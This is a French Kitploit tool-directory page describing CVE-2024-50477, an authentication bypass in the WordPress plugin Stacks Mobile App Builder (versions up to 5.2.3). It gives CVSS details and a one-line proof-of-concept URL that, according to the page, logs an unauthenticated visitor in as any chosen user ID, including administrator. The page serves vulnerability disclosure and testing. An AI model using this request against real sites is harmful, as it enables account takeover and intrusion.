Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-50477 — Stacks Mobile App Builder <= 5.2.3 - Contournement d'authentification via prise de contrôle de compte | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2024-50477
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubrandomrobbiebf/cve-2024-50477

CVE-2024-50477

Stacks Mobile App Builder <= 5.2.3 - Contournement d'authentification via prise de contrôle de compte

Voir le dépôt
3il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-50477

Stacks Mobile App Builder <= 5.2.3 - Contournement d'authentification via prise de contrôle de compte

Description:

Le plugin Stacks Mobile App Builder – le constructeur d'applications mobiles par glisser-déposer le plus puissant pour WordPress est vulnérable à un contournement d'authentification dans toutes les versions jusqu'à 5.2.3 incluse. Cela est dû au fait que le plugin ne vérifie pas correctement l'identité d'un utilisateur avant de l'authentifier via la fonction receive_request_checkout(). Cela permet à des attaquants non authentifiés de se connecter en tant que n'importe quel utilisateur en se basant sur l'ID utilisateur.

root@kitploit:~
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50477
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: stacks-mobile-app-builder

Preuve de concept

root@kitploit:~
http://kubernetes.docker.internal/?mobile_co=1&uid=1

Vous devriez être redirigé et connecté en tant qu'administrateur. L'ID est l'utilisateur sous lequel vous souhaitez vous connecter.

Télécharger l’outil